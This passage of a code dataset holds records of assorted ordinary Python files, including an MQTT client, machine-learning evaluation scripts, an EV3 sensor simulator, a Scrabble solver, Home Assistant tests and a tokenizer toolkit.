str(mid) + \" \" + str(granted_qos))\n\n\ndef on_log(mosq, obj, level, string):\n    config.logging.debug(string)\n\n\ndef mqttPetrologDaemon():\n    # Assign event callbacks\n    mqttc.on_message = on_message\n    mqttc.on_connect = on_connect\n    mqttc.on_publish = on_publish\n    mqttc.on_subscribe = on_subscribe\n\n    # Connect\n    mqttc.connect('54.85.197.66', 1883)\n\n    mqttc.loop_forever()\n","sub_path":"mqttPetrolog.py","file_name":"mqttPetrolog.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"23076336","text":"\nimport tensorflow as tf\n\nmatrix1=tf.constant([[3.,3.]])\nmatrix2 = 
tf.constant([[2.],[2.]])\nproduct = tf.matmul(matrix1, matrix2)\n\nmnist=tf.keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\nprint(x_train)","sub_path":"Principal_Component_Analysis_(PCA)_with_Python_Examples /test_tensorflow.py","file_name":"test_tensorflow.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446351799","text":"import os\nimport tqdm\nimport pickle\nimport subprocess\n\nimport torch\nimport numpy as np\n\nimport datasets\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Neural Machine Translation with Seq2Seq.')\n parser.add_argument('--gpu', type=str, default='0')\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--train_path', type=str, default='data/iwslt2014/train.de-en.bpe')\n parser.add_argument('--dev_path', type=str, default='data/iwslt2014/dev.de-en.bpe')\n parser.add_argument('--test_path', type=str, default='data/iwslt2014/test.de-en.bpe')\n args = parser.parse_args()\n\n print('Setting CUDA_VISIBLE_DEVICES...')\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print('Done.')\n\n print('Loading config')\n config = torch.load(os.path.join('experiments/test', 'config.pt'))\n dataset = config['dataset']\n\n print('Loading data...')\n func = getattr(datasets, dataset)\n (source, target), (train_iterator, val_iterator, test_iterator) = func(device, args.batch_size, args.train_path,\n args.dev_path, args.test_path)\n print('Done.')\n\n print('Creating model...')\n model = torch.load('experiments/test/model.pkl')\n model.to(device)\n print('Done.')\n\n target_sos_idx = target.vocab.stoi['']\n output_file = open('experiments/test/predictions', 'wt')\n\n # validation\n model.eval()\n test_loss = 0.\n for i, batch in enumerate(tqdm.tqdm(test_iterator)):\n with torch.no_grad():\n batch_input_seq, batch_input_len = batch.src\n outputs, logits_seq = model(batch_input_seq, output_seq=None, training=False,\n sos_tok=target_sos_idx, max_length=100, device=device)\n\n # convert to tokens\n itos = lambda x: target.vocab.itos[x]\n outputs = np.vectorize(itos)(outputs.T)\n\n # write to file\n for i in outputs:\n output_file.write(' '.join(i) + '\\n')\n output_file.close()\n\n print('Detokenizing...')\n subprocess.run('./detokenizer.sh %s %s 2> /dev/null' % ('./experiments/test/predictions', 'en'), shell=True)\n print('Done.')\n\n print('Calculating BLEU...')\n subprocess.run('cat ./experiments/test/predictions.detok | sacrebleu %s' % './data/iwslt2014/references.de-en.en', shell=True)\n print('Done.')\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"221925386","text":"import math\nimport numpy as np\nfrom ev3sim.simulation.loader import ScriptLoader\n\n\nclass InfraredSensorMixin:\n\n device_type = \"lego-sensor\"\n\n ALL_VALUES = \"AC-ALL\"\n DIRECTION = \"AC\"\n ALL_VALUES_DC = \"DC-ALL\"\n DIRECTION_DC = \"DC\"\n\n mode = ALL_VALUES\n\n # Left to Right, bearing relative to middle.\n SENSOR_BEARINGS = [\n np.pi / 3,\n np.pi / 6,\n 0,\n -np.pi / 6,\n -np.pi / 3,\n ]\n\n SENSOR_BEARING_DROPOFF_MAX = np.pi / 4\n\n MAX_SENSOR_RANGE = 120\n\n MAX_STRENGTH = 9\n\n SUBSENSOR_BIAS_MAGNITUDE = 5\n\n def generateBias(self):\n self.distance_biases = 
[\n (0.5 - self._interactor.random()) * 2 * self.SUBSENSOR_BIAS_MAGNITUDE\n if ScriptLoader.RANDOMISE_SENSORS\n else 0\n for _ in range(5)\n ]\n self._values = [0 for _ in self.SENSOR_BEARINGS]\n\n def _sensorStrength(self, relativeBearing, distance, sensorIndex):\n perceived_distance = max(distance + self.distance_biases[sensorIndex], 0)\n while relativeBearing > np.pi:\n relativeBearing -= 2 * np.pi\n while relativeBearing < -np.pi:\n relativeBearing += 2 * np.pi\n if perceived_distance > self.MAX_SENSOR_RANGE:\n return 0\n if abs(relativeBearing) > self.SENSOR_BEARING_DROPOFF_MAX:\n return 0\n # At halfway to the sensor, this value is 1/4.\n sq_dist = pow(perceived_distance / self.MAX_SENSOR_RANGE, 2)\n exclude_bearing = (1 - sq_dist) * self.MAX_STRENGTH\n bearing_mult = 1 - abs(relativeBearing) / self.SENSOR_BEARING_DROPOFF_MAX\n return int(math.floor(exclude_bearing * bearing_mult + 0.5))\n\n def _sensorValues(self, relativeBearing, distance):\n return [self._sensorStrength(relativeBearing - b, distance, i) for i, b in enumerate(self.SENSOR_BEARINGS)]\n\n def _predict(self, sensorValues):\n total = sum(sensorValues)\n if total <= 4:\n return 0\n weighted = sum([i * v / total for i, v in enumerate(sensorValues)])\n # weighted is between 0 and len(sensorValues)-1.\n return int(max(min(1 + math.floor(weighted / (len(sensorValues) - 1) * 9), 9), 1))\n\n def _getObjName(self, port):\n return \"sensor\" + port\n\n def applyWrite(self, attribute, value):\n if attribute == \"mode\":\n self.mode = value\n else:\n raise ValueError(f\"Unhandled write! {attribute} {value}\")\n\n def toObject(self):\n data = {\n \"address\": self._interactor.port,\n \"driver_name\": \"ht-nxt-ir-seek-v2\",\n \"mode\": self.mode,\n }\n if self.mode == self.ALL_VALUES:\n for x in range(7):\n data[f\"value{x}\"] = self.value(x)\n elif self.mode == self.DIRECTION:\n data[\"value0\"] = self.value(0)\n elif self.mode == self.ALL_VALUES_DC:\n for x in range(7):\n data[f\"value{x}\"] = 0\n elif self.mode == self.DIRECTION_DC:\n data[\"value0\"] = 0\n else:\n raise ValueError(f\"Unhandled mode {self.mode}\")\n return data\n","sub_path":"ev3sim/devices/infrared/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"112327223","text":"'''\nWhat is the longest word you can build in a game of Scrabble one letter at a time?\nThat is, starting with a valid two-letter word, how long a word can you build\nby playing one letter at a time on either side to form a valid three-letter word,\nthen a valid four-letter word, and so on? 
(For example, HE could become THE, then THEM,\nthen THEME, then THEMES, for a six-letter result.)\n'''\n\n# First draft\n# Runs with little noticeable delay so no optimizations added\n\nfilename = \"english_dict.txt\"\nlines = open(filename).read().splitlines()\n\n\n# Find longest wordlength to initialize dict\nlongest_wordlength = 0\nfor line in lines:\n if len(line) > longest_wordlength:\n longest_wordlength = len(line)\n\n# Dict with wordlengths as keys\nkeys = [x + 1 for x in range(longest_wordlength)]\nd = dict.fromkeys(keys)\n\n\n# Init and fill dict (set for fast contains check)\nfor key in d.keys():\n d[key] = set()\n\nfor line in lines:\n d[len(line)].add(line)\n\n\n# Check if there is a scrabble path to a minimal (2-length) word from current word\ndef check_word(word):\n path = [word]\n i = 0\n for word_length in range(len(word)-1, 1, -1):\n if path[i][1:] in d[word_length]:\n path.append(path[i][1:])\n elif path[i][:len(path[i])-1] in d[word_length]:\n path.append(path[i][:len(path[i])-1])\n else:\n return False, path\n i+=1\n return True, path\n\n# Returns first, longest, complete scrabble path in our dictionary\ndef check_all_words():\n for word_length in range(28, 1, -1):\n for word in d[word_length]:\n success, path = check_word(word)\n if success:\n return path\n\nprint(check_all_words())\n\n\n","sub_path":"#307-scrabble_problem/scrabble.py","file_name":"scrabble.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"441620129","text":"\"\"\"Test Mikrotik setup process.\"\"\"\nfrom unittest.mock import AsyncMock, Mock, patch\n\nfrom homeassistant.components import mikrotik\nfrom homeassistant.setup import async_setup_component\n\nfrom . import MOCK_DATA\n\nfrom tests.common import MockConfigEntry\n\n\nasync def test_setup_with_no_config(hass):\n \"\"\"Test that we do not discover anything or try to set up a hub.\"\"\"\n assert await async_setup_component(hass, mikrotik.DOMAIN, {}) is True\n assert mikrotik.DOMAIN not in hass.data\n\n\nasync def test_successful_config_entry(hass):\n \"\"\"Test config entry successful setup.\"\"\"\n entry = MockConfigEntry(\n domain=mikrotik.DOMAIN,\n data=MOCK_DATA,\n )\n entry.add_to_hass(hass)\n mock_registry = Mock()\n\n with patch.object(mikrotik, \"MikrotikHub\") as mock_hub, patch(\n \"homeassistant.helpers.device_registry.async_get_registry\",\n return_value=mock_registry,\n ):\n mock_hub.return_value.async_setup = AsyncMock(return_value=True)\n mock_hub.return_value.serial_num = \"12345678\"\n mock_hub.return_value.model = \"RB750\"\n mock_hub.return_value.hostname = \"mikrotik\"\n mock_hub.return_value.firmware = \"3.65\"\n assert await mikrotik.async_setup_entry(hass, entry) is True\n\n assert len(mock_hub.mock_calls) == 2\n p_hass, p_entry = mock_hub.mock_calls[0][1]\n\n assert p_hass is hass\n assert p_entry is entry\n\n assert len(mock_registry.mock_calls) == 1\n assert mock_registry.mock_calls[0][2] == {\n \"config_entry_id\": entry.entry_id,\n \"connections\": {(\"mikrotik\", \"12345678\")},\n \"manufacturer\": mikrotik.ATTR_MANUFACTURER,\n \"model\": \"RB750\",\n \"name\": \"mikrotik\",\n \"sw_version\": \"3.65\",\n }\n\n\nasync def test_hub_fail_setup(hass):\n \"\"\"Test that a failed setup will not store the hub.\"\"\"\n entry = MockConfigEntry(\n domain=mikrotik.DOMAIN,\n data=MOCK_DATA,\n )\n entry.add_to_hass(hass)\n\n with patch.object(mikrotik, \"MikrotikHub\") as mock_hub:\n mock_hub.return_value.async_setup = 
AsyncMock(return_value=False)\n assert await mikrotik.async_setup_entry(hass, entry) is False\n\n assert mikrotik.DOMAIN not in hass.data\n\n\nasync def test_unload_entry(hass):\n \"\"\"Test being able to unload an entry.\"\"\"\n entry = MockConfigEntry(\n domain=mikrotik.DOMAIN,\n data=MOCK_DATA,\n )\n entry.add_to_hass(hass)\n\n with patch.object(mikrotik, \"MikrotikHub\") as mock_hub, patch(\n \"homeassistant.helpers.device_registry.async_get_registry\",\n return_value=Mock(),\n ):\n mock_hub.return_value.async_setup = AsyncMock(return_value=True)\n mock_hub.return_value.serial_num = \"12345678\"\n mock_hub.return_value.model = \"RB750\"\n mock_hub.return_value.hostname = \"mikrotik\"\n mock_hub.return_value.firmware = \"3.65\"\n assert await mikrotik.async_setup_entry(hass, entry) is True\n\n assert len(mock_hub.return_value.mock_calls) == 1\n\n assert await mikrotik.async_unload_entry(hass, entry)\n assert entry.entry_id not in hass.data[mikrotik.DOMAIN]\n","sub_path":"tests/components/mikrotik/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"517838550","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os, datetime, sys, md5\nimport sqlalchemy as sqAl\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker as sqAl_sessionmaker, composite as sqAl_composite\nimport ConfigParser\nfrom composite_col import CompositeCol\nfrom settings import *\nfrom structure import structure as STRUCTURE \n\ndef generate_class(name): # Don't know if we really need name\n\n Base = declarative_base(sqAl.MetaData())\n\n mf_specs = { # specifics of the multi-column fields \n 'multi_bool': {\n 'format': DB_FMT_MB,\n 'db_col_type': sqAl.Boolean,\n },\n 'multi_int': {\n 'format': DB_FMT_MI,\n 'db_col_type': sqAl.Integer,\n },\n 'multi_select': {\n 'format': DB_FMT_MS,\n 'db_col_type': sqAl.Integer,\n },\n 'multi_numeric': {\n 'format': DB_FMT_MN,\n 'db_col_type': sqAl.Integer,\n }\n }\n\n dynclass_dict = {\n 'id': sqAl.Column(sqAl.Integer, primary_key=True),\n '__tablename__': 'participants'\n }\n for field in STRUCTURE.cap_items:\n if field['typ'] in ('str','enum'):\n dynclass_dict[field['fieldname']] = sqAl.Column(field['fieldname'], sqAl.String)\n elif field['typ'] in ('multi_bool', 'multi_int'):\n specs = mf_specs[field['typ']]\n sub_fields = []\n for i, item in enumerate(field['allowance']):\n fn = specs['format'] % (field['fieldname'], i)\n cf = sqAl.Column(fn, specs['db_col_type'], default=field['default'])\n dynclass_dict[fn] = cf\n sub_fields.append(cf)\n dynclass_dict[field['fieldname']] = sqAl_composite(CompositeCol, *sub_fields)\n elif field['typ'] in ('multi_select', 'multi_numeric'):\n specs = mf_specs[field['typ']]\n sub_fields = []\n for name, label in field['allowance']:\n fn = specs['format'] % (field['fieldname'], name)\n cf = sqAl.Column(fn, specs['db_col_type'], default=field['default'])\n dynclass_dict[fn] = cf\n sub_fields.append(cf)\n dynclass_dict[field['fieldname']] = sqAl_composite(CompositeCol, *sub_fields)\n elif field['typ'] in ('int', 'dropdown', 'enumber'): \n dynclass_dict[field['fieldname']] = sqAl.Column(field['fieldname'], sqAl.Integer, default=-1)\n\n return type(name, (Base,), dynclass_dict)\n\nParticipant = generate_class('Participant')\n\n\nif __name__ == '__main__':\n engine = sqAl.create_engine('sqlite:///%s' % wx.Config(CONFIG_MAIN_NAME).Read(CONFIG_DB_PATH_NAME), echo=True)\n 
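# sqAl_sessionmaker (SQLAlchemy's sessionmaker) returns a Session factory bound to this engine; echo=True logs the emitted SQL\n    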
Session = sqAl_sessionmaker(bind=engine)\n session = Session()\n\n # t = Participant(name='DynClass V.', \n # f29=CompositeCol(True,True,True,False,False,False,False,False,False,False,True,True,True,True),\n # f32=CompositeCol(14,21,28,0,0,0,0,0))\n # print session.add(t)\n p = session.query(Participant).filter(Participant.id == 2).first()\n p.mtpv = 2\n # p.name = 'Etre Petetre'\n # setattr(p,'f2', 28)\n # results = session.query(Participant).all()\n # for rec in results:\n # [setattr(rec, f['fieldname'], 0) for f in STRUCTURE.db_items if f['typ'] == 'dropdown' and getattr(rec, f['fieldname']) == -1]\n session.commit()\n # print dir(p)\n","sub_path":"participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"356164142","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport io\n\ntry:\n import docutils\nexcept ImportError:\n docutils = None # NOQA\n\nfrom acrylamid.readers import reststyle, markdownstyle, distinguish\n\n\nclass TestStyles(unittest.TestCase):\n\n @unittest.skipIf(docutils is None, 'no docutils available')\n def test_rest(self):\n\n header = [\"Header\",\n \"======\",\n \"\",\n \":date: 2001-08-16\",\n \":version: 1\",\n \":draft: True\",\n \":authors: foo, bar\",\n \":indentation: Since the field marker may be quite long, the second\",\n \" and subsequent lines of the field body do not have to line up\",\n \" with the first line, but they must be indented relative to the\",\n \" field name marker, and they must line up with each other.\",\n \":parameter i: integer\",\n \"\",\n \"Hello *World*.\"]\n\n i, meta = reststyle(io.StringIO('\\n'.join(header)))\n assert i == len(header) - 1\n\n assert 'foo' in meta['authors']\n assert meta['version'] == 1\n assert meta['date'] == '2001-08-16'\n assert 'second and subsequent' in meta['indentation']\n assert meta['draft'] is True\n\n def test_mkdown(self):\n\n header = [\"Title: My Document\",\n \"Summary: A brief description of my document.\",\n \"Authors: Waylan Limberg\",\n \" John Doe\",\n \"Date: October 2, 2007\",\n \"blank-value: \",\n \"base_url: http://example.com\",\n \"\",\n \"This is the first paragraph of the document.\"]\n\n i, meta = markdownstyle(io.StringIO('\\n'.join(header)))\n assert i == len(header) - 1\n\n assert 'John Doe' in meta['authors']\n assert meta['date'] == 'October 2, 2007'\n assert meta['blank-value'] == None\n\n\ndef testQuotes():\n\n assert distinguish('\"') == '\"'\n assert distinguish('\"\"') == ''\n\n assert distinguish('Foo\"') == 'Foo\"'\n assert distinguish('\"Foo') == '\"Foo'\n\n assert distinguish('\"Foo\" Bar') == '\"Foo\" Bar'\n assert distinguish('\"Foo Bar\"') == 'Foo Bar'\n\n assert distinguish(\"\\\"'bout \\\" and '\\\"\") == \"'bout \\\" and '\"\n","sub_path":"specs/test_reader.py","file_name":"test_reader.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"368592084","text":"# coding: utf-8\nfrom sqlalchemy import create_engine\n\n\ndef checkdb(val1, val2,inkey):\n #key1= '1710240037'\n key1= inkey\n strsql='select u_id,repair_order_type from repair_order where repair_order_code = \\''\n strsql += key1\n strsql += '\\';'\n #print (strsql)\n rs = connection.execute(strsql)\n #print (rs.rowcount)\n data = rs.fetchone()\n #print(data)\n #print ('1 ok')\n 
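# rowcount > 0 means the repair order exists; next look up its '回单' (return-receipt) trouble record\n    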
if rs.rowcount > 0:\n        str1=data[0]\n        str2=data[1]\n        #print (str1)\n        strsql = 'select trouble_name,trouble_way from repair_trouble where repair_order_uid = \''\n        strsql += str1\n        strsql += '\' and repair_trouble_type = '\n        strsql += '\'回单\''\n        print (strsql)\n        print ('2 ok')\n        rs = connection.execute(strsql)\n        if rs.rowcount > 0:\n            data2 = rs.fetchone()\n            print('3 ok')\n            #print (data2)\n            #print (data2[1])\n            if data2[1]== '':\n                print ('binggo')\n                print(key1+'||'+data2[0]+'||'+str(data2[1]))\n                h2.write(key1+'||'+data2[0]+'||'+str(data2[1])+'\\n')\n                print ('finish------------------------')\n            # strsql2='select out_bill_code from t_out_head where REPAIR_BILL_CODE = \''\n            # strsql2 += key1\n            # strsql2 += '\''\n            # print(strsql2)\n            # print ('3 ok')\n            # list1=[]\n            # rs = connection.execute(strsql2)\n            # for row in rs:\n            #     print (row[0])\n            #     list1.append(row[0])\n            #     strsql3 = 'select product_name from t_out_sub where OUT_BILL_CODE = \''\n            #     strsql3 += row[0]\n            #     strsql3 += '\''\n            #     print (strsql3)\n            #     rs = connection.execute(strsql3)\n            #     print ()\n            #     for row2 in rs:\n            #         print (row2)\n            #         print (data2[0] + '|' + row2[0])\n\n\nh1=open('e:\list3.txt','r')\nwq=\"mysql+pymysql://root@localhost:3306/track_db?charset=utf8\"\nh2 = open('e:\list417.txt', 'a+')\nengine = create_engine(wq, max_overflow=3)\nconnection = engine.connect()\nconnection = connection.execution_options( isolation_level=\"READ COMMITTED\")\nfor r1 in h1:\n    if r1.startswith('17'):\n        s1=r1.replace('\\n','')\n        #print (s1)\n        checkdb(wq,\"五汽票务\",s1)\n\nconnection.close()\nh2.close()","sub_path":"corp_sr/analize_zh/stage1.py","file_name":"stage1.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"329613961","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nthis module defines tokenizing tools for us to use in learner modules. \ntypically tokenizing takes a long string and returns a collection of tokens\nthus any processing to get the long string should be done outside the tokenizing functions\n'''\n\nimport os \nimport numpy as np \nimport nltk \nfrom nltk.corpus import stopwords \nfrom collections import defaultdict \nimport re \n\nnltk_stop_words = set(stopwords.words('english'))\n\n# =============================== small methods/tools ==========================================================================\n\n# filter function for List_to_BOW\ndef Default_word_filter(word:str) -> bool: \n    ''' by default, every word is counted'''\n    return True \n\n# modifier function for List_to_BOW\ndef Default_word_modifier(word:str) -> str: \n    ''' by default, words are not modified'''\n    return word \n\n# converts a bag of words to a string for printing\ndef BOW_to_str(bow:dict, freq_order=True, top_k=-1, indent='') -> str: \n    ''' This method turns a bow into a user-friendly string for printing \n        printing order can be by frequency, or by a-b-c if by freq is false \n        the number of words to print out can be specified by top k \n        by default, all words are printed out, with the specified indent'''\n    to_return = '' \n    if freq_order:\n        items = sorted(bow.items(), key=lambda x: x[1], reverse=True) \n    else: \n        items = sorted(bow.items(), key=lambda x: x[0]) \n    \n    for word, freq in items: \n        to_return += indent \n        to_return += word \n        to_return += ' -> ' \n        to_return += str(freq) \n        to_return += os.linesep \n        top_k -= 1 \n        if top_k == 0: \n            break \n    return to_return\n    \n\n'''============================================== methods to make long string from collections ================================================'''\n# concatenate a list of strings into a long string \ndef Concatenate_str_list(str_list:list, random_order=False, splitter=os.linesep) -> str: \n    ''' This function takes a list of strings and concatenates them into a long string \n        random order means items are concatenated in random order \n        splitter is what to put in between items in the long string''' \n    if not random_order: \n        to_return = splitter.join(str_list) \n        return to_return\n    else: \n        index_arr = np.arange(len(str_list), dtype=int)\n        np.random.shuffle(index_arr) \n        to_return = '' \n        for i in index_arr: \n            assert type(str_list[i]) == str, 'concatenating non string items' \n            to_return += str_list[i] \n            to_return += splitter \n        return to_return \n    \n\n'''=============================== this part is for methods turning long strings into lists ============================================================'''\n# simple tokenizer using nltk\ndef Simple_tokenizer(long_string:str, remove_stop_words=True, stop_words=nltk_stop_words, case_sensitive=False) -> list: \n    ''' This method tokenizes a long string by white space, retaining marks such as question marks\n        parameter options are whether to remove stop_words (from nltk module or specified otherwise), \n        and whether it is case sensitive \n        return value is a list of tokens made'''\n    if not case_sensitive: \n        long_string = long_string.lower() \n    tokens = nltk.tokenize.word_tokenize(long_string) \n    if remove_stop_words: \n        to_return = [w for w in tokens if not(w in stop_words)] \n    else: \n        to_return = list(tokens) \n    return to_return \n    \n\n# default tokenizer that separates by space \ndef Default_tokenizer(long_string:str, stopwords={}, min_len=1) -> list: \n    ''' this default tokenizer splits the sentence by white space, \n        removes stop words from the passed set, \n        removes any token that is shorter than minimum length \n        returns the token list ''' \n    return [i for i in long_string.split() if not((i in stopwords) or (len(i) < min_len))] \n    \n\n# modifier for tokens in embedding training; maps common variants to canonical tokens \ndef Embedding_word_modifier(word:str, stop_words=nltk_stop_words) -> str: \n    ''' Takes a word, checks for various conditions, makes modifications, returns the result, or None if in stop words''' \n    \n    # match F, special case \n    F = re.compile(\"^\\s[Ff]\\s$\") \n    if re.match(F, word): \n        return \"F\" \n    # other than special cases, remove stop words\n    if word in stop_words: \n        return None\n    # match question marks ???\n    q_marks = re.compile(\"^\\?{2,}$\") \n    if re.match(q_marks, word): \n        return \"???\" \n    # match exclamation marks !!!\n    exclmtn_marks = re.compile(\"^!{2,}$\") \n    if re.match(exclmtn_marks, word): \n        return \"!!!\" \n    # match ??!?!??!? \n    q_exc_marks = re.compile(\"^[!?]{2,}$\") \n    if re.match(q_exc_marks, word): \n        return \"!?\" \n    # match variations of pog\n    pog = re.compile(\"^p+o+g+$\") \n    if re.match(pog, word): \n        return \"pog\" \n    # match variations of nice\n    nice = re.compile(\"^n+i+c+e+u*|n+a+i+s+u+$\") \n    if re.match(nice, word): \n        return \"nice\" \n    # match variations of noice \n    noice = re.compile(\"^n+o+i+c+e+$\") \n    if re.match(noice, word): \n        return \"noice\" \n    # match variations of haha \n    haha = re.compile(\"^(ha){2,}h?$|h{3,}$\") \n    if re.match(haha, word): \n        return \"haha\" \n    # match variations of lol \n    lol = re.compile(\"^l+o+l+$\") \n    if re.match(lol, word): \n        return \"lol\" \n    # match variations of lul \n    lul = re.compile(\"^l+u+l+$\") \n    if re.match(lul, word): \n        return \"lul\" \n    # match variations of lmao\n    lmao = re.compile(\"^lmf?ao+$\") \n    if re.match(lmao, word): \n        return \"lmao\" \n    # match variations of yes \n    yes = re.compile(\"^y+e+s+$\") \n    if re.match(yes, word): \n        return \"yes\" \n    # match variations of noo \n    noo = re.compile(\"^n+o{2,}$\") \n    if re.match(noo, word): \n        return \"noo\" \n    # match variations of no \n    no = re.compile(\"^(no){2,}$\") \n    if re.match(no, word): \n        return \"no\" \n    # match variations of yeah \n    yeah = re.compile(\"^y+e+a+h*$|^ya$|^ye+$\") \n    if re.match(yeah, word): \n        return \"yeah\" \n    # match variations of ree \n    ree = re.compile(\"^r+e+$\") \n    if re.match(ree, word): \n        return \"ree\" \n    # match variations of oof \n    oof = re.compile(\"^o{2,}f+$\") \n    if re.match(oof, word): \n        return \"oof\" \n    # match variations of pogu \n    pogu = re.compile(\"^p+o+g+u+$\") \n    if re.match(pogu, word): \n        return \"pogu\" \n    # xd \n    xd = re.compile(\"^xd+$\") \n    if re.match(xd, word): \n        return \"xd\" \n    # ez \n    ez = re.compile(\"^e+z+$\") \n    if re.match(ez, word): \n        return \"ez\" \n    # money \n    money = re.compile(\"^mo+ne+y+$\") \n    if re.match(money, word): \n        return \"money\" \n    \n    return word \n    \n\n# tokenize a sentence for embedding training, \ndef Embedding_tokenize(sentence:str, word_filter=Embedding_word_modifier, case_sensitive=False) -> list: \n    ''' Tokenization customized to embedding, takes a sentence and returns a list of tokens''' \n    # check case sensitivity \n    if not case_sensitive: \n        sentence = sentence.lower() \n    # make token pattern and match them\n    token_pattern = \"\\s[Ff]\\s|[?!]{2,}|[:;]\\)|[^\\s',@.():?!]{2,}|\\w:|:\\w\\s\" \n    token_pattern = re.compile(token_pattern) \n    raw_tokens = re.findall(token_pattern, sentence) \n    \n    # put each token through a modifier, which also checks for validity \n    to_return = list()\n    for token in raw_tokens: \n        modified = word_filter(word=token) \n        if modified is not None: \n            to_return.append(modified) \n    return to_return \n\n\n'''================================ methods for processing list of tokens into BOW (sets, dicts, etc) 
============================================='''\n\n# converts list of tokens to bag of words\ndef List_to_bow(token_list:list, filter_func=Default_word_filter, modifier_func=Default_word_modifier, n_gram=1, connector=''): \n ''' takes a list of tokens, make them into a bag of words based on some conditions \n n grams will be conted, default is 1, they will be connected with connector string specified\n first, the raw word has to pass a filter, by default, all are passed \n second, the raw word is modified, by default, they remain the same \n ''' \n to_return = defaultdict(int) \n ngram_window = [] \n for token in token_list: \n assert type(token) == str, 'passed token not string' \n if not filter_func(token): \n continue \n ngram_window.append(modifier_func(token)) \n if len(ngram_window) < n_gram: \n continue\n if len(ngram_window) > n_gram: \n ngram_window.pop(0) \n for i in range(len(ngram_window)): \n word = connector.join(ngram_window[:i+1]) \n to_return[modifier_func(word)] += 1 \n \n\n while(len(ngram_window) > 0): \n ngram_window.pop(0)\n for i in range(len(ngram_window)): \n word = connector.join(ngram_window[:i+1]) \n to_return[modifier_func(word)] += 1 \n\n return to_return \n\n \n \n","sub_path":"Tokenizer_kit.py","file_name":"Tokenizer_kit.py","file_ext":"py","file_size_in_byte":9296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359048079","text":"import numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nimport datetime\nimport math\nimport gc\nimport time\nimport pickle\n\n\nprint()\nprint('This is [no drill] testing program.')\nprint()\nsince = time.time()\n# print_time = str(int(time.time()))\ndata_dir = '../data/'\nsave_dir = '../saves/'\ndf = pd.DataFrame()\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!\n\nmodel_name = '[]_0.6788_Light_gbdt_1512883008.model'\n\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!\nprint()\nprint('!'*60)\nprint()\nprint(' FAKE MODEL '*2)\nprint('loading model:', model_name)\nprint(' FAKE MODEL '*2)\nprint('check if its right.')\nprint()\nprint('!'*60)\nprint()\nmodel_name = model_name[:-6]\nmodel = pickle.load(open('../fake/saves/' + 'model/' + model_name + '.model', \"rb\"))\n\nprint('loading complete.')\n\nis_train = True\n# is_train = False\n# is_test = True\nis_test = False\n# barebone = True\nbarebone = False\n\non = False\n\n# on = [\n# 'msno',\n# 'song_id',\n# 'target',\n# 'source_system_tab',\n# 'source_screen_name',\n# 'source_type',\n# 'language',\n# 'artist_name',\n# 'song_count',\n# 'member_count',\n# 'song_year',\n# ]\n\n\ninner = [\n '[0.67982]_0.6788_Light_gbdt_1512750240.csv',\n '[0.62259]_0.6246_Light_gbdt_1512859793.csv'\n]\ninner = False\n\n\ndef insert_this(on_in):\n global df\n on_in = on_in[:-4]\n df1 = pd.read_csv('../saves/feature/'+on_in+'.csv')\n df1.drop('id', axis=1, inplace=True)\n on_in = on_in[-10:]\n df1.rename(columns={'target': on_in}, inplace=True)\n df = df.join(df1)\n del df1\n\n\ndef insert_this_test(on_in):\n global df\n on_in = on_in[:-4]\n df1 = pd.read_csv('../saves/submission/'+on_in+'.csv')\n df1.drop('id', axis=1, inplace=True)\n on_in = on_in[-10:]\n df1.rename(columns={'target': on_in}, inplace=True)\n df = df.join(df1)\n del df1\n\n\nif is_train:\n print('making new feature phase:')\n print('loading train set.')\n load_name = 'train_set'\n dt = pickle.load(open('../saves01/' + load_name + '_dict.save', \"rb\"))\n df = pd.read_csv('../saves01/' + load_name + \".csv\", dtype=dt)\n del dt\n df.drop('genre_ids', axis=1, inplace=True)\n if barebone:\n ccc = [i for i in 
